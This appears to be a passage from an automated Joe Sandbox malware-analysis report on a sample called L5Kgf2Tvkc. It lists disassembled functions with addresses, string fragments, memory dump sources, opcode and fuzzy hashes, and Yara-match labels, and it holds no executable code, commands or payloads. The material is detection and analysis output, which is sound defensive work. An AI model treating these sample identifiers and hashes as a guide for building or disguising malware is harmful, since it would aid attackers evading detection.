Function 0043DBF0 Relevance: 1.7, Strings: 1, Instructions: 488COMMON

Download Yara Rule

Strings

"C, xrefs: 0043E014

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "C
API String ID: 0-2206442469
Opcode ID: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
Instruction ID: f391942a458117ab2eff221fcfc61aedbfa58ea332473f0907b71af19172290f
Opcode Fuzzy Hash: da03289935d2a365dedf4cbe9730c3ecdc5a79b854c84855746c9a427666edbc
Instruction Fuzzy Hash: 89E1E239B18211CFCB08CF29D8916AEB7B2FF8A315F1986BDD50697395C7349852CB84

Function 0063D467 Relevance: 1.7, Strings: 1, Instructions: 475COMMON

Download Yara Rule

Strings

pq, xrefs: 0063D56D

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: pq
API String ID: 0-1239689891
Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
Instruction ID: 4809da534ea9bce9956e984f0dc2593e8fbeefb6ca668eb1078e2bb35cead399
Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
Instruction Fuzzy Hash: C2C1E1B5A183018BD724CF28DC527ABB3F2EF95314F08992CE8C58B394E7389905C796

Function 0041D200 Relevance: 1.7, Strings: 1, Instructions: 475COMMON

Download Yara Rule

Strings

pq, xrefs: 0041D306

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: pq
API String ID: 0-1239689891
Opcode ID: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
Instruction ID: 500f681a5dc29514dd64ddcd126b613fb850ea0849f1361138090b14647004ae
Opcode Fuzzy Hash: 8f7d284124c82df3290142075c504644928a384a95776854a061d4f458ab5068
Instruction Fuzzy Hash: 3FC1F1B5A183108BD724CF28C8917ABB3F2EF95314F08892DE8C58B395E738D945C75A

Function 0043DC80 Relevance: 1.7, Strings: 1, Instructions: 454COMMON

Download Yara Rule

Strings

"C, xrefs: 0043E014

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "C
API String ID: 0-2206442469
Opcode ID: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
Instruction ID: 13288392fc325517df86cad4ade3bbe7b083210dd55d9389e011795523972a75
Opcode Fuzzy Hash: 93cfdb384fbbcdf934b2e1f9f719d80038c7b1012457b02cac8aa074438e88da
Instruction Fuzzy Hash: A1D1E236B18211CFCB08CF29D8916AEB7B2FB8A315F1986BDD54697395C7349C02CB94

Function 0043DD00 Relevance: 1.7, Strings: 1, Instructions: 446COMMON

Download Yara Rule

Strings

"C, xrefs: 0043E014

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "C
API String ID: 0-2206442469
Opcode ID: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
Instruction ID: c02c92b643ec8d6061b0b585771056a8a7c41fa14bd75fb70af057f1c39578d8
Opcode Fuzzy Hash: 9bbcde8f8e236cf10bfcc444cae987d80eafb99731bf26b6d9bde5d12487c25a
Instruction Fuzzy Hash: 86D1F135A18215CFCB08CF39D8912BEBBB2FB8A315F1986BDD44297381C7349802CB94

Function 00438F45 Relevance: 1.7, Strings: 1, Instructions: 418COMMON

Download Yara Rule

Strings

:, xrefs: 00439411

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: :
API String ID: 0-336475711
Opcode ID: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
Instruction ID: 45885d3b4d1d012f206d53a257d01764ec68dfae15cf9f6058a92df6a7d4df09
Opcode Fuzzy Hash: d4da6a1f1a33f302b28b3d272f302cdbfe495a8cad6bdfe1330f27f80afea027
Instruction Fuzzy Hash: C3D1483AA24222CBCB148FB8D9411AFB3B1FF4A311F1A8879C941A7394D7799D52C794

Function 0064B737 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 0064BA1F

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
Instruction ID: 27f8c77519357bc7e7cc195f35dbf9d76a7719cc286d4713794d4ead0f047af5
Opcode Fuzzy Hash: 05b104109d6c0075ab7dc577c3c86a3515419e1534bd09f8d34e410d61e0de0f
Instruction Fuzzy Hash: 11D123B2A083159FC714CE24C8907ABB7EBAF85310F18952DE8998B382DB74DD45CBC1

Function 0042B4D0 Relevance: 1.7, Strings: 1, Instructions: 408COMMON

Download Yara Rule

Strings

", xrefs: 0042B7B8

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
Instruction ID: 5488062bd572d25524ecec9402af32519797fcb3431be29340e35f15c478a4d7
Opcode Fuzzy Hash: 91379af672f1dbe31fa7d13f69b6f352546ad0d77617e07e08176a71aae7ab56
Instruction Fuzzy Hash: 2FD116B2B083249FC714DE15E48076BB7EAEF84314F48856EE9998B382D738DD4487D6

Function 00416930 Relevance: 1.7, Strings: 1, Instructions: 402COMMON

Download Yara Rule

Strings

<, xrefs: 00416B51

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID: <
API String ID: 2994545307-4251816714
Opcode ID: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
Instruction ID: bc8ced4a158fefc9f1f828ddbeaf2a6aa2fbb25641fc4c758a13245c578b86aa
Opcode Fuzzy Hash: e1e623f7c7005093f9756282a6e98d0fa5f88134fad289d3bd4a8170d5ba78f4
Instruction Fuzzy Hash: 15A19A766082508FD328CB24C8917BBB7D2EBCA304F1A897ED4D5D7252D738D841CB6A

Function 0065F847 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

*+,-, xrefs: 0065F8CC

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: *+,-
API String ID: 0-2789019292
Opcode ID: 23cae88c1f738cc6ba2b498dbaf025c6893f717e4732141eb56e127dbc4aeec8
Instruction ID: 5d7f5cecdf109aebf6b4a1d809fd10ff07eaa4c12a2a42b415bc2e4b7f3b27a7
Opcode Fuzzy Hash: 23cae88c1f738cc6ba2b498dbaf025c6893f717e4732141eb56e127dbc4aeec8
Instruction Fuzzy Hash: 97A1F332A183118FC718DF28C891A6BB7E2EB95314F19893DEC99C7351D635EC0A8782

Function 0043F5E0 Relevance: 1.6, Strings: 1, Instructions: 372COMMON

Download Yara Rule

Strings

, xrefs: 0043F810

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-3019521637
Opcode ID: fa0d1dbce1a23fbc74967c61ce0e7e6dda5e1035aa80ce491c1cbcb6fe002f0c
Instruction ID: 6aed45fb233aa2c4fcd704149bf514c963fdf9759b22d2805e031f74d6e47680
Opcode Fuzzy Hash: fa0d1dbce1a23fbc74967c61ce0e7e6dda5e1035aa80ce491c1cbcb6fe002f0c
Instruction Fuzzy Hash: 4FA11632A183115FC718DF28C89166BB7E2EB99314F19983EE8D5C7351D639EC0A8786

Function 00414F1E Relevance: 1.6, Strings: 1, Instructions: 336COMMON

Download Yara Rule

Strings

rt, xrefs: 0041506C

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: rt
API String ID: 0-702342736
Opcode ID: 96955da5e24119577bef1d16513d434ecf30bcbd4f9f4d61d22251255e7bbb69
Instruction ID: 0dc673b11f2f29cf9410cafdc44ae5b0865e538447e6119a8d8e6fbf35fadf0c
Opcode Fuzzy Hash: 96955da5e24119577bef1d16513d434ecf30bcbd4f9f4d61d22251255e7bbb69
Instruction Fuzzy Hash: DFB11676908351CBC720CF29C8807AB77E1EFC5364F198A6EE8C98B351E7349942CB56

Function 00416603 Relevance: 1.6, Strings: 1, Instructions: 334COMMON

Download Yara Rule

Strings

*iA, xrefs: 004165F6, 00416924

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID: *iA
API String ID: 2994545307-2139077580
Opcode ID: 14f9abbb0dd42c412e929981e749cd9f1ec22b6100c6e352dcc535541c924817
Instruction ID: 6e94b3fcf232f5d03b146c20a53fd0e815a3357b0506236d01a4d6b9f375cd80
Opcode Fuzzy Hash: 14f9abbb0dd42c412e929981e749cd9f1ec22b6100c6e352dcc535541c924817
Instruction Fuzzy Hash: 9F7104366452118BD728DF14C8927BBB393FBC9318F1A553E88D957296C738DC42CB89

Function 0064BBE7 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0064BDE5

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: b7ed90a694172920b175933414aedd1b328fa125c93d7129e303e34ccc337f8e
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 86711632A083558BD724CE2CC4C039EBBE3ABC5750F29E96DE5949B391D735DC498B82

Function 0042B980 Relevance: 1.5, Strings: 1, Instructions: 236COMMON

Download Yara Rule

Strings

", xrefs: 0042BB7E

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: "
API String ID: 0-123907689
Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction ID: c4d9b42fc58f09a600c35257a89653f03652f6e6775d652d055d3af208aaf9ad
Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
Instruction Fuzzy Hash: 6671D332B083254BD724CE29E48032BBBE2EBC5710F99C52FE4949B395D7389D4587CA

Function 0063CD8D Relevance: 1.5, Strings: 1, Instructions: 218COMMON

Download Yara Rule

Strings

+, xrefs: 0063CF44

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: +
API String ID: 0-574889464
Opcode ID: b0fe1e084bfa776934ec890522000dd81f3ca0d79d61515cd075c0078fed0f1c
Instruction ID: e57fd8fa1c311a1f49cc7e33c6917b40e44568f7caa248dbfa5a384ca4aa1dd1
Opcode Fuzzy Hash: b0fe1e084bfa776934ec890522000dd81f3ca0d79d61515cd075c0078fed0f1c
Instruction Fuzzy Hash: 0371B9B254C3909BD304DF65885186FFBE2EF82304F48886CF1D59B311D63A9609DB96

Function 00635185 Relevance: 1.5, Strings: 1, Instructions: 212COMMON

Download Yara Rule

Strings

rt, xrefs: 006352D3

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: rt
API String ID: 0-702342736
Opcode ID: b3c739285426b182c49243b50139ef0afb5c4c44dfbc0fbbface3e97e13e158b
Instruction ID: a821a437855cec98a367cd1e11b27ee105535c2e5e223c6eff2a8b965c864fc8
Opcode Fuzzy Hash: b3c739285426b182c49243b50139ef0afb5c4c44dfbc0fbbface3e97e13e158b
Instruction Fuzzy Hash: F171F2715083218BD724DF29C8906ABB7F2FFC4754F198A5DE8C68B364E7709902CB86

Function 0063B5C7 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_, xrefs: 0063B6C3

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: 860b7b0a3b2a3b631b4a1e805e6d132f1054dbf297f53b1e233929b4f662fe50
Instruction ID: ccb649cb5ae1b93270bd046874bd4a1249a159a1dc4e068ecaf5f3f287e92671
Opcode Fuzzy Hash: 860b7b0a3b2a3b631b4a1e805e6d132f1054dbf297f53b1e233929b4f662fe50
Instruction Fuzzy Hash: 3671491560569109D76CDF348893737BAE69F44308F2891AEC965CFFABFA38C5038749

Function 0041B360 Relevance: 1.5, Strings: 1, Instructions: 201COMMON

Download Yara Rule

Strings

_, xrefs: 0041B45C

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: _
API String ID: 0-701932520
Opcode ID: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
Instruction ID: 91adedf6748a9dca2f1a78b1e507b8d61ea5c2b795734500ece8cd71c55922e5
Opcode Fuzzy Hash: ee4ac179044c3f7383c156140ccdd89d0e3231ce0658b60971308e5cd19b2ba5
Instruction Fuzzy Hash: C271F85520469149D72CDF748893337BAE69F84308B2891BFD955CFBA7FA38C1438789

Function 0064C536 Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

x^T:, xrefs: 0064C5D7

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: x^T:
API String ID: 0-4046853431
Opcode ID: 2fba3cff2e712456624dfaec6a58e9274202b5be26e54dad0cca218db8944b39
Instruction ID: 69f4d2fcbfd5fb087d17d29515cbf2629a373d60e9bd9ceb73af2508e45158be
Opcode Fuzzy Hash: 2fba3cff2e712456624dfaec6a58e9274202b5be26e54dad0cca218db8944b39
Instruction Fuzzy Hash: 0A5128B1A0D3919FE3218B29C8907BAFBD2AFE3311F18989DE4C587341D7368905CB56

Function 0042C2CF Relevance: 1.4, Strings: 1, Instructions: 194COMMON

Download Yara Rule

Strings

x^T:, xrefs: 0042C370

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: x^T:
API String ID: 0-4046853431
Opcode ID: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
Instruction ID: 89561afeee3bb8202773f312476c0e81b73573d3d24e9526409a401e0603a0db
Opcode Fuzzy Hash: e31bfd97cdbca3c70ba9f5c1bb4fca88fd095036d1b234706b61afd3b6481d50
Instruction Fuzzy Hash: 5C5128B46083A19BD321DB29D4A077BBBD1AFE7304F58885EE8C687341D6394905CB56

Function 006383DD Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

DBCD, xrefs: 006383FC

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: DBCD
API String ID: 0-3972649111
Opcode ID: 1da4b6897d511e356b1ebc23eec36a16c5eae396d3714c4eee6a91f3ccd77571
Instruction ID: b2294065adbd78f665ccb8b671b237191b87f6f7e72ff1fbab83aeb23d7f3d30
Opcode Fuzzy Hash: 1da4b6897d511e356b1ebc23eec36a16c5eae396d3714c4eee6a91f3ccd77571
Instruction Fuzzy Hash: 635108366183118FD7248B28C821BEAB7E3FBC5314F2A453DD989D7292DB359802CB85

Function 00418176 Relevance: 1.4, Strings: 1, Instructions: 182COMMON

Download Yara Rule

Strings

DBCD, xrefs: 00418195

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID: DBCD
API String ID: 2994545307-3972649111
Opcode ID: 91d37935f36f46556a6b50f0f3136ee6619ea6db3f6409a747e5bbc80fb58e1a
Instruction ID: 244c48801a6beffa120859c347b683f921f31d654a72ffce60c91e75d6a5c392
Opcode Fuzzy Hash: 91d37935f36f46556a6b50f0f3136ee6619ea6db3f6409a747e5bbc80fb58e1a
Instruction Fuzzy Hash: 9D513C366182118FD7248B28CC11BEBB7D2FBC5714F19453DC9D9D3292DB359842CB89

Function 00629D28 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

<=, xrefs: 00629EF3

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: <=
API String ID: 0-1782720273
Opcode ID: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
Instruction ID: 2bba5b23b586b21224c8dd9e2f01ad118d2e4da63c6d7b18b0130f15dd6bfab6
Opcode Fuzzy Hash: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
Instruction Fuzzy Hash: 4E5139B6E513684BDB14CFB9D8812DEBA32EB89314F0982A9D844B7744E7348D458FC5

Function 00409AC1 Relevance: 1.4, Strings: 1, Instructions: 168COMMON

Download Yara Rule

Strings

<=, xrefs: 00409C8C

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: <=
API String ID: 0-1782720273
Opcode ID: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
Instruction ID: c36e57fc54e8ebb91c1d5de0612bd1b6b956f574d134e83768c4160145cd7853
Opcode Fuzzy Hash: 5840dc97e85359ba13058269382f43ee069955b4541cfd0c5025b4a86daafca6
Instruction Fuzzy Hash: 8A5139B6E513684BDB14CFB9D8812DEBA32FB89310F0982A9D844B7344E7348D458FC5

Function 0062EF47 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

H, xrefs: 0062F0DE

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
Instruction ID: 6621471c2ac8ca91c14bf81421b38b50bddb031d00990ad02a9388c8cd91c952
Opcode Fuzzy Hash: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
Instruction Fuzzy Hash: 2551F13160C7A08BD7209B7894513EFBBE6ABC6310F194E3ED8D987382D6398502CB43

Function 0040ECE0 Relevance: 1.4, Strings: 1, Instructions: 160COMMON

Download Yara Rule

Strings

H, xrefs: 0040EE77

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: H
API String ID: 0-2852464175
Opcode ID: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
Instruction ID: b490a7b8e69dba0a299ff7ef51fd341b042986cf65b0f910d3ddf594bd78af48
Opcode Fuzzy Hash: e1abe98de3425fd04befb758b88ca7be288ae45674263f711d55fda94f78aa6e
Instruction Fuzzy Hash: DF51CF3260C3908BD7259B3984912EFBBE5ABC6310F194E3EE4D9973C2D6388542D787

Function 0043D450 Relevance: 1.4, Strings: 1, Instructions: 129COMMON

Download Yara Rule

Strings

ul, xrefs: 0043D561

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: ul
API String ID: 0-4068291676
Opcode ID: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
Instruction ID: 162c06210579af30b91d2e802b6b39d5a7fb57fbd88dc5fca12273f2b30ca4e7
Opcode Fuzzy Hash: 09d47b0d80f7065e4a3fffddd9f75c44f89de03e5ddc334a4cab4097f41f42d0
Instruction Fuzzy Hash: 66316032B086501BC70CDA2888A257BB7E29BDE319F19D13ED895C73D2D538DD068744

Function 0065EDB7 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 0065EE1F

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: @
API String ID: 0-2766056989
Opcode ID: 67278b35a64899c4e843d92a3e23c7a93933160186b17761f2465089cb72818a
Instruction ID: 30b77ebd7c22dd15d328c6619253903546f9323b79e9421f25dea96f869897f1
Opcode Fuzzy Hash: 67278b35a64899c4e843d92a3e23c7a93933160186b17761f2465089cb72818a
Instruction Fuzzy Hash: 8031E1765183048FC718DF54D8C166BB7F6FB85314F19483CEA8997350E336A918CB66

Function 0043EB50 Relevance: 1.4, Strings: 1, Instructions: 107COMMON

Download Yara Rule

Strings

@, xrefs: 0043EBB8

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID: InitializeThunk
String ID: @
API String ID: 2994545307-2766056989
Opcode ID: 00826e0d4f886e63537347e67f3b42d852862df1b35b6d533ae3730f77ba7a75
Instruction ID: c497bc3c17aefed4a2b0ec07c899be2d1253584fb416e3315b0134f03c6467ad
Opcode Fuzzy Hash: 00826e0d4f886e63537347e67f3b42d852862df1b35b6d533ae3730f77ba7a75
Instruction Fuzzy Hash: 5A3102721083009FC314DF58D8C166BB7F5FB8A314F19982DEA85873A1D339A918CB6A

Function 00429170 Relevance: 1.4, Strings: 1, Instructions: 104COMMON

Download Yara Rule

Strings

A%&', xrefs: 0042919A

Memory Dump Source

Source File: 00000000.00000002.2043550688.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.2043550688.0000000000454000.00000040.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_L5Kgf2Tvkc.jbxd

Similarity

API ID:
String ID: A%&'
API String ID: 0-1522422272
Opcode ID: 184964f8b652324f2e113d025011fc4e3a587f1cbb9a8a3454d8662ee6523bd1
Instruction ID: 913c420f85954eed9bd1d458c10467abd4bf7e3dae9106fcd3ab7ebdbb23f432
Opcode Fuzzy Hash: 184964f8b652324f2e113d025011fc4e3a587f1cbb9a8a3454d8662ee6523bd1
Instruction Fuzzy Hash: CC2109B12483185FE718DF249C56B6FB7A1EB82300F05882CE5858B1C6D678D509C746

Function 006493D7 Relevance: 1.3, Strings: 1, Instructions: 90COMMON

Download Yara Rule

Strings

A%&', xrefs: 00649401

Memory Dump Source

Source File: 00000000.00000002.2043678067.0000000000620000.00000040.00001000.00020000.00000000.sdmp, Offset: 00620000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_620000_L5Kgf2Tvkc.jbxd

Yara matches

Similarity

API ID:
String ID: A%&'
API String ID: 0-1522422272
Opcode ID: 6c468d9e47f163ecf295c8918dd1b24acd601c3279c28ca58949edf8f5818bcf
Instruction ID: 4ef510238fb0900a41c7874b9cfc95e7d5c30b6032d8390265fedfa7b264f948
